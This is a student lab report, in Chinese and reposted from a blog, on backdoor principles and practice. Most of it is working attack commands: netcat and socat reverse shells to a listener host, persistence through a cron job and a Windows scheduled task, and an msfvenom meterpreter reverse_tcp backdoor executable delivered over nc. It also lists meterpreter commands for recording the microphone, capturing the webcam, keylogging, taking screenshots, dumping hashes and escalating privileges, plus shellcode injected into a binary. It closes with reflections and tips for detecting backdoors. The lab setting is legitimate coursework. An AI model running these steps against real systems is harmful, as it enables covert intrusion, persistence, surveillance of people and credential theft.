ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Exp2-后门原理与实践

2022-03-28 16:35:34  阅读:230  来源: 互联网

标签:后门 shell Windows Exp2 实践 获取 socat 11310


Exp2-后门原理与实践

实验内容 (4分+2分附加题)

(1)使用netcat获取主机操作Shell,cron启动 (1分)

(2)使用socat获取主机操作Shell, 任务计划启动 (1分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (1分)

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(2分)加分内容一并写入本实验报告。
(评分者注意,附加分写在评论里,不要和主分数混在一起)

一、常用后门工具

​ 1.Netcat 、Socat系列

​ 2.Meterpreter

​ 3.Intersect

​ 4.CHAOS……

​ 本次实验我们主要使用Netcat 、Socat系列以及Meterpreter。

二、实验内容

(一)使用netcat获取主机操作Shell,cron启动

1.kali获取windows虚拟机的shell

(1)查看kali虚拟机的IP地址
ifconfig

image-20220328145638357

(2)在kali虚拟机中开启监听,端口号以学号为基础指定
nc -l -p 11310

image-20220328150159057

(3)windows反弹连接Linux,这里首先在windows下进入ncat所在的文件夹,ip的地址为Linux的地址
ncat.exe -e cmd.exe 192.168.40.128 11310

image-20220328150237745

(4)Linux下看到Windows的命令提示,验证shell

image-20220328150314905

2.Windows获取kali虚拟机的shell

(1)获取Windows中的IP地址
ipconfig

image-20220328150442897

(2)在ncat文件夹目录下打开监听,端口选择类学号数字
ncat.exe -l -p 11310

image-20220328150530413

(3)Linux反弹连接win
nc 192.168.3.40 11310 -e /bin/sh

$$
/bin/sh是UNIX命令提供shell去执行shell命令
$$

image-20220328150911516

(4)Windows获得kali的shell,使用linux常用指令验证
ls pwd whoami

image-20220328150942038

3.cron启动

Linux下进行
①Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
man cron

image-20220328151006165

②crontab指令增加一条定时任务,"-e"表示编辑
crontab -e

image-20220328151102338

③第一次编辑需要选择,我们选择2选项
④设置自启动时间,每个小时的第12分钟执行后面的指令
12 * * * * /bin/netcat 172.16.229.166 11310 -e /bin/sh

image-20220328151805963

⑤在相应的时间节点打开监听,这里我们选择主机Windows

image-20220328151645226

时间节点已经到,我们可以看见这里window已经获得了Linux的shell

(二)使用socat获取主机操作Shell, 任务计划启动

1.Windows获取kali虚拟机的shell

(1)Kali开放11310端口
socat tcp-listen:11310 system:bash,pty,stderr

image-20220328151933829

(2)Windows连接Kali虚拟机,获取终端,IP地址为Linux地址
socat - tcp:192.168.40.128:11310

image-20220328152139653

注意:需要在socat文件目录中运行

(3)验证终端功能,完全正常
ls pwd whoami

image-20220328152155118

2.Kali获取Windows虚拟机的shell

(1)Windows开放11310端口
socat tcp-listen:11310 exec:cmd,pty,stderr 

image-20220328152422148

(2)Kali机连接Windows获取终端
socat - tcp:192.168.3.40:11310

image-20220328152449576

(3)验证shell,成功
dir

image-20220328152452383

3.Windows下任务计划启动

(1)创建基本任务,在计算机管理的任务计划程序中进行操作

image-20220328152707323

(2)进行触发器、操作的相关设置
(3)编辑操作时,在参数中写上以下数据
tcp-listen:11310 exec:cmd,pty,stderr
(4)等待达到相应设计的时间进行观察

image-20220328153059498

(5)在Kali中进行socat连接,测试shell

image-20220328153148922

(三)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.Kali端生成后门可执行文件

Kali执行以下代码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=11310 -f exe > 20191310_backdoor.exe

image-20220328153413224

2.利用ncat将后门文件传送到Windows下获取终端

(1)在Windows的cmd下监听11310端口,获取后门文件
ncat.exe -l 11310 > 20191310_backdoor.exe

image-20220328153520981

(2)虚拟机传送后门文件
nc 192.168.3.40 11310 < 20191310_backdoor.exe

image-20220328154118997

(3)查看传送结果

传送成功:

image-20220328153710003

image-20220328154133295

(4)MSF

①启动msf

msfconsole

image-20220328154151376

②进行相关设置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 

image-20220328154225322

③设置LHOST、LPORT

set LHOST 192.168.40.128
set LPORT 11310

image-20220328154341324

(5)进行触发

exploit

(5)Windows下进行操作,打开后门可执行文件(可以用管理员身份运行)

(6)获取shell终端,使用dir验证,显示成功

image-20220328155422956

(四)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.获取目标主机音频

输入以下指令

record_mic

image-20220328155628310

2.获取目标摄像头内容

输入以下指令

webcam_snap

image-20220328155647333

3.获取击键记录

keyscan_start//开始记录
keyscan_dump//读取

image-20220328155732086

4.获取截屏信息

screenshot

image-20220328155811246

5.尝试提权

getsystem

根据此处博客设置方法,最终提权成功,在此不再赘述(https://blog.csdn.net/redwand/article/details/107527710)

6.许多有趣的攻击指令

	record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam
    hashdump       Dumps the contents of the SAM database
    timestomp      Manipulate file MACE attributes
    shell		   getshell

(五)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

1.后门exe文件方法

①生成exe可执行文件
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.40.128 LPORT=11310 -x pwn1 -f elf > pwn_exp2

image-20220328160020649

②运行生成的文件,注意必须先给生成的文件以权限
chmod +x pwn_exp2 *给权限*
./pwn_exp2 | nc 192.168.3.40 11310 -e /bin/sh *运行文件*

image-20220328161509070

③Windows下监听,获取shell并使用以下指令验证shell
ls whoami pwd

image-20220328161454086

三、实验总结与体会

​ 通过本次实验,我学会了在理想情况下,也就是实验情况下对linux和windows植入后门的操作,这算是我第一次对于后门的实践,这里面包括开启侦听、反弹连接、生成和传送后门程序、利用后门或者传送的程序控制被控主机、修改定时任务列表、使用ncat的加强工具socat获取主机操作Shell等。

​ 实验过程中,已经完完全全体会到了攻击者的“乐趣”和攻击成功后的成就感,当看到我的电脑摄像头自己闪光的时候,我想到了斯诺登揭露的那些事,原来这种技术我们就可以实现最简单的实践,这是何其真实和危险!

​ 网络安全有关国家安全,这次是真真切切让我感受到了,网络的世界有多少深不可测的高手,网络的空间有多少实实在在的攻击和巧妙的攻击手段,信息安全、网络安全绝对不容忽视!

​ 网络安全异常重要,网络对抗的实验真真切切让我学到了很多!我知道了后门的原理并且进行了简单的实践!

四、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

我能想到的是我们下载软件的时候,采用的是一些方法链接,或者非官方渠道进行下载的话,这些我们下载的程序很有可能便被挂马或者留下后门了,而且一定是经过精心设计的,这样当我们使用这些程序软件的时候,后门就进入到我们的系统了

(2)例举你知道的后门如何启动起来(win及linux)的方式?

后门修改了系统设置,将定时启动管理器添加了定时的启动参数

linux中crontab文件被修改,周期性反向连接控制主机**

(3)Meterpreter有哪些给你映像深刻的功能?

生成的后门程序若在“理想情况”下可以偷偷录像,偷偷拍照,偷偷干好多事,非常有趣,但现在就是学习如何在现实状况下突破杀毒软件、防火墙等等障碍实现后门

(4)如何发现自己有系统有没有被安装后门?

1.看杀毒软件的反馈,如360,火绒等

2.观察系统的自启动项

  1. 观察任务管理器内的进程,看是否有异常进程和可疑进程
  2. 观察任务计划程序

标签:后门,shell,Windows,Exp2,实践,获取,socat,11310
来源: https://www.cnblogs.com/sisterben/p/16067688.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有